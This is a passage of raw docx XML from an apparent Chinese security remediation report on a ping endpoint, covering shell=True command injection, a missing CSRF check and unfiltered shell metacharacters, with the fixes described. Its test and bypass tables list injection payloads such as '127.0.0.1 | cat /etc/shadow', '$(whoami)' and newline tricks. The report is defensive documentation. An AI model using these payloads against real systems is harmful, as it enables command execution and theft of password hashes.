          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>socket.getaddrinfo(ip, 80)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:line="280" w:lineRule="exact"/>
        <w:ind w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 第二层: 列表参数，无shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:line="280" w:lineRule="exact"/>
        <w:ind w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>result = subprocess.check_output(["ping", "-c", "3", ip])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>【修复后验证】</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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>测试用例</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>修复前</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>修复后</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>127.0.0.1; id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>执行 id 命令，输出 uid=0(root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>无效的 IP 地址或域名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>127.0.0.1 | cat /etc/shadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>读取 root 密码哈希</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>无效的 IP 地址或域名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>`uname -a`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>执行 uname 命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>无效的 IP 地址或域名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>$(whoami)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>执行 whoami 命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>无效的 IP 地址或域名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>127.0.0.1 &amp;&amp; whoami</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>执行 whoami 命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>无效的 IP 地址或域名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>127.0.0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>正常 Ping 回显</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>正常 Ping 回显（功能正常）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>8.8.8.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>正常 Ping 回显</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>正常 Ping 回显（功能正常）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CMDI-002：CSRF 缺失 — Ping 接口无 Token 校验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>【漏洞描述】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/ping 新增时未添加 CSRF Token 校验，攻击者可构造跨站请求在管理员浏览器中执行任意系统命令。结合 shell=True 命令注入（CMDI-001），CSRF 将漏洞威力成倍放大。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>【修复思路】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在 ping() 路由入口处添加 _check_csrf() 校验，与项目中其他 POST 路由保持一致。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>【修复后验证】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>无 CSRF Token 提交 /ping → 返回"安全验证失败"。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CMDI-003：特殊字符绕过 — shell 元字符未过滤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>【漏洞描述】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>系统未对输入做任何过滤，攻击者可利用多种 shell 元字符绕过简单的过滤。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>【绕过手法汇总】</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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>绕过方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>利用手法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>示例</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>命令分隔符</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>分号 ; 连接多条命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>127.0.0.1; id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>逻辑或</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>|| 前一条失败后执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>|| whoami</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>逻辑与</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>&amp;&amp; 前一条成功后执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>&amp;&amp; cat /etc/shadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>管道</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>| 前一条输出给后一条</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>| ls -la</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>反引号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>`` 内命令优先执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>`id`</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>子 Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>$() 内命令优先执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>$(whoami)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>换行符</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>\n 等同于分号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2882"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>127.0.0.1\nid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>【修复思路】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用正则白名单拦截所有 shell 元字符，配合列表参数实现纵深防御。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>【修复后验证】</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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b/>
